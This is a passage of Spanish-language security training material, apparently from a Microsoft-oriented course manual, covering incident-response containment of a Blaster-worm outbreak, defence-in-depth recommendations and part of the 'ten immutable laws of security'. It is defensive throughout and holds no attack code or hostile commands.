Ancho de banda de red
Cualquier recurso o servicio
58
1.49. Lista de comprobación de respuestas a incidentes
Cap1-26.jpg
59
1.50. Contención de los efectos de un ataque
Perímetro
• El servidor de seguridad de red debe bloquearlo de acuerdo con su diseño
Red
• Buscar y detectar los sistemas vulnerables
• Desactivar las conexiones de red en los hosts vulnerables
• Utilizar cuarentena de RRAS para asegurar que los hosts de acceso
telefónico tengan aplicadas las revisiones adecuadas
Host
• Utilizar IPSec para permitir el uso del puerto UDP 135 entrante sólo en los
hosts que requieran RPC
• Utilizar Firewall de Windows para bloquear el tráfico entrante que no se
desea que llegue a los hosts (en Windows XP y versiones posteriores). En
este ejemplo, se ha producido la proliferación de una variedad del virus
Blaster. Se pueden tomar medidas en diversos niveles del modelo de
60
defensa en profundidad para impedir que un gusano ataque el puerto de
Protocolo de datagramas de usuario (UDP, User Datagram Protocol) 135.
Perímetro
• Examinar todos los archivos adjuntos en la puerta de enlace SMTP
Red
• Utilizar la cuarentena de RRAS para comprobar las revisiones aplicadas y las
firmas de virus
Aplicación
• Microsoft Office 98
• Comprobar que esté instalada la actualización de seguridad de Microsoft
Outlook® 98.
• Office 2000.
• Comprobar que esté instalado al menos el Service Pack 2
• Office XP y Office 2003
• La configuración predeterminada de zona de seguridad es sitios restringidos
(en lugar de Internet) y las secuencias de comandos activas dentro de los
sitios restringidos, también están deshabilitadas de forma predeterminada
Usuarios
• Enseñar a los usuarios que los archivos adjuntos pueden ser peligrosos.
• Si se recibe un archivo adjunto que no se ha pedido, escribir a su autor para
comprobar el propósito antes de abrirlo
Perímetro
• Habilitar o bloquear el servidor de seguridad
61
Red
• Desconectar el cable de red
Host
• Iniciar el sistema e inicie sesión
• Se pueden necesitar credenciales administrativas locales si las almacenadas
en caché están deshabilitadas
• Active Firewall de Windows para bloquear todo el tráfico entrante
• Volver a conectar el cable de red
• Descargar e instalar las revisiones apropiadas
• Reiniciar el sistema
• Desactivar Firewall de Windows según la directiva
1.55. Recomendaciones
Recomendaciones de seguridad.
Lista de comprobación de la seguridad.
Defensa en profundidad
Seguro por diseño
Privilegios mínimos
Aprender de los errores cometidos
Mantener la seguridad
Hacer que los usuarios se centren en la concienciación de seguridad
62
Desarrollar y probar planes y procedimientos de respuesta a
incidentes
63
• Tomar la delantera manteniéndose informado de los problemas
relacionados con la seguridad. Microsoft enviará boletines de seguridad a
través del correo electrónico a los suscriptores. Muchos ataques se
efectúan aprovechando defectos de seguridad para los que existe alguna
revisión. Comprobar que se dispone de las herramientas de
administración de revisiones más actualizadas.
• No olvidar realizar una defensa en profundidad. Implementar
procedimientos de seguridad en todos los niveles del modelo, ya que
unos dependen de otros. La seguridad de una red viene definida por su
punto más débil.
• No dejar jamás de recalcar la importancia de efectuar copias de seguridad
con regularidad. La pérdida o la modificación de los datos puede resultar
catastrófica para un negocio. Deben llevarse a cabo copias de seguridad
habitualmente. Almacenar siempre las copias de seguridad en un lugar
donde no estén los datos. Realizar también procedimientos de
restauración periódicamente.
• Averigüar cómo podrían atacar. Se deben conocer las herramientas de
ataque de un sistema y los virus. Investigar dónde se producen los
ataques y cómo. La encuesta sobre seguridad y delitos informáticos de
CSI/FBI puede ser un buen lugar para comenzar.
64
Cap1-27.jpg
65
control al propio servidor y, por lo tanto, controlar todos los sitios que
contenga, incluido el de uno.
5. Si un intruso puede averiguar su contraseña, podrá iniciar sesión en el
equipo y realizar en él todas las acciones que puede hacer uno. Utilizar
siempre una contraseña; resulta increíble el número de cuentas que
tienen contraseñas en blanco. Y elegir una compleja. No utilizar el nombre
de un perro, fecha de aniversario ni el nombre de un equipo de fútbol
favorito. No emplear la palabra contraseña.
6. Un administrador poco confiable puede anular el resto de medidas de
seguridad que haya aplicado. Puede cambiar los permisos del equipo,
modificar las directivas de seguridad del sistema, instalar software
peligroso y suplantar a los usuarios, o realizar muchas otras acciones
diferentes. Puede sabotear prácticamente cualquier medida de protección
del sistema operativo, puesto que lo controla. Y lo que es peor, puede
borrar sus huellas. Si el administrador no es de confianza, el sistema no
tendrá ninguna seguridad en absoluto.
7. Muchos sistemas operativos y productos de software de criptografía dan
la opción de almacenar las claves criptográficas en el equipo. La ventaja
es la comodidad: no hay que ocuparse de la clave; pero esto es a costa
de la seguridad. Las claves se suelen disimular (es decir, se ocultan) y
algunos de los métodos para descubrirlas son bastante buenos. Pero, al
final, no importa lo bien oculta que esté la clave: si se halla en el equipo,
es posible encontrarla. Tiene que ser posible encontrarla; después de
todo, el software puede encontrarla, así que alguien suficientemente
motivado también podrá. Siempre que sea posible, se deben guardar las
claves en otro lugar.
8. Los detectores de virus comparan los datos de un equipo con un conjunto
de firmas de virus. Cada firma es característica de un virus en particular y,
cuando el detector encuentra en un archivo, en un mensaje de correo
electrónico o en algún otro lugar datos que coincidan con la firma,
determina que ha encontrado un virus. Sin embargo, un detector de virus
sólo puede encontrar los virus que conoce. Es vital mantener el archivo
de firmas del detector de virus actualizado porque cada día se crean virus
nuevos.
9. La mejor forma de proteger la privacidad en Internet es igual que en la
vida normal: con forma de actuar. Leer las declaraciones de privacidad de
los sitios Web que se visitan y realizar transacciones sólo con aquellos
con cuyas prácticas se está de acuerdo. Si preocupan los cookies,
deshabilitarlos. Especialmente, no explorar la Web de forma
indiscriminada: sabemos que la mayor parte de las ciudades tienen una
zona que es mejor evitar, e Internet es igual.
10. Una seguridad perfecta requiere un grado de perfección que simplemente
no existe en realidad y que no es probable que exista nunca. Esto es
cierto tanto en el software como en casi todos los campos de interés
humano. El desarrollo de software es una ciencia imperfecta y casi todo el
software tiene errores. Algunos de ellos se pueden aprovechar para
66
infringir la seguridad. Esto es la realidad. Pero aunque el software pudiera
ser perfecto, con ello no se solucionaría todo el problema. La mayor parte
de los ataques implican, en cierto grado, alguna manipulación de la
naturaleza humana, en lo que se suele denominar estratagemas sociales.
Si se aumenta el costo y la dificultad de atacar la tecnología de seguridad,
quienes tengan malas intenciones responderán cambiando el modo de
actuar y pasarán a centrarse en la persona que se encuentra tras la
consola en lugar de en la tecnología. Es vital conocer la función de
mantenimiento de una seguridad sólida; en caso contrario sólo uno podría
convertirse en el punto débil del blindaje de los sistemas.
Ejercicio 3: Cómo configurar Firewall de Windows para permitir el uso del puerto
3389
67
Este ejercicio lo deberá realizar en la computadora remota.
Caso práctico
Disciplina de administración de riesgos de seguridad
Defensa en profundidad
Respuesta a incidentes de seguridad
Ejemplos de ataques
Recomendaciones
Diez normas de seguridad inmutables
68
Obtener las directrices de seguridad de Microsoft más recientes:
http://www.microsoft.com/technet/security/bestprac/ (este sitio está en
inglés)
69